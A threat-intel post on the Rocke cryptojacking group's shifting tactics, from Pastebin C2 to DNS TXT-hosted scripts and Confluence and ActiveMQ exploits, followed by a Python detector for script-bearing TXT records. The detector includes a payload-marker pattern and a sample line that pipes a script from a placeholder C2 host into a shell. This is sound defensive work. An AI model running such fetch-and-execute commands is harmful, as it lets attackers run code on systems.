Threat Watch

Rocke Cybercrime Group Changing TTPs

Rocke: The Chinese-speaking cybercrime group dubbed Rocke has been active since early 2018 and has carried out various crypto-jacking schemes. In March 2019, according to Anomali Labs, the group began using a Golang-based dropper dubbed LSD that used Pastebin for its Command and Control (C2) servers. The new malware allowed the group to set up Monero (XMR) crypto-jacking operations with nearly non-existent detection rates by anti-virus products, far lower than the detection rates for the group’s earlier tools developed in Python. A month after the Pastebin C2 servers were discovered, the group began exploiting CVE-2019-3396 in vulnerable Confluence servers for remote code execution, which allowed it to drop crypto-miner payloads onto those servers. In July, Rocke switched from Pastebin to C2 servers it hosted itself, which let it keep its crypto-mining scripts out of the public eye and reduced the chance of the servers being taken down. In September the group shifted to storing its crypto-mining scripts in Domain Name System (DNS) TXT records instead of Pastebin pastes. Alongside these changes, the group also began using a different vulnerability, CVE-2016-03088, which affects ActiveMQ servers.


This evolution of the Rocke group is a perfect example of how threat actor groups switch their Tactics, Techniques, and Procedures (TTP’s) to evade detection by anti-virus products and security research groups. Cryptojacking is a lucrative crime that groups are continuously trying to leverage for financial gain, and all systems within an organization should have some type of monitoring on them to detect when this is occurring. In this case, the group is also utilizing old exploits that would not be able to be used if systems were up-to-date on all their security patches.
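One monitoring check that follows from the DNS TXT technique described above, written as an added example for this post (not Anomali's or Rocke's code): a heuristic that flags TXT answers carrying base64-encoded or script-like content. The log layout ("ts client qname qtype rdata"), the marker strings and every sample record are constructed assumptions.

```python
# Heuristics for DNS TXT records abused as script hosting. Added example for this
# post; the log layout ("ts client qname qtype rdata") and all records are constructed.
import base64
import re

# Strings a shell-script payload tends to contain (assumed markers, not from the post).
SCRIPT_MARKERS = re.compile(rb"#!/bin/|\bcurl\b|\bwget\b|crontab|chmod \+x|/dev/shm")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/=]+$")
MAX_BENIGN_TXT_LEN = 255  # SPF/verification records rarely exceed one 255-byte string


def score_txt_record(rdata):
    # Return the reasons a TXT value looks like hosted script content ([] if benign).
    reasons = []
    if len(rdata) > MAX_BENIGN_TXT_LEN:
        reasons.append("oversized")
    payload = rdata.encode()
    if len(rdata) >= 32 and B64_ALPHABET.match(rdata):
        try:
            payload = base64.b64decode(rdata, validate=True)  # inspect the decoded script
            reasons.append("base64")
        except ValueError:  # base64-looking but not decodable: keep the raw bytes
            pass
    if SCRIPT_MARKERS.search(payload):
        reasons.append("script-markers")
    return reasons


def scan_dns_log(lines):
    # Return (qname, reasons) for each TXT answer that trips at least one heuristic.
    hits = []
    for line in lines:
        fields = line.split(maxsplit=4)
        if len(fields) < 5 or fields[3] != "TXT":
            continue
        reasons = score_txt_record(fields[4].strip().strip('"'))
        if reasons:
            hits.append((fields[2], reasons))
    return hits


_SCRIPT = b"#!/bin/bash\ncurl -fsSL http://c2.invalid/x.sh | sh\n"  # constructed payload
SAMPLE_LOG = [  # constructed records: legitimate SPF, ACME token, then a script-bearing TXT
    '2019-09-10T08:00:01Z 10.0.0.5 example.com TXT "v=spf1 include:_spf.example.com -all"',
    '2019-09-10T08:00:02Z 10.0.0.5 _acme-challenge.example.com TXT "gfj9Xq-Z2Y1c0OcgWZm3kAAi_KFXJ8OrZLp7oR3F-0w"',
    '2019-09-10T08:00:03Z 10.0.0.7 t.c2.invalid TXT "%s"' % base64.b64encode(_SCRIPT).decode(),
]
```

Tune MAX_BENIGN_TXT_LEN and the marker list against your own resolver logs; long DKIM keys, for instance, will trip the size check and need an allowlist.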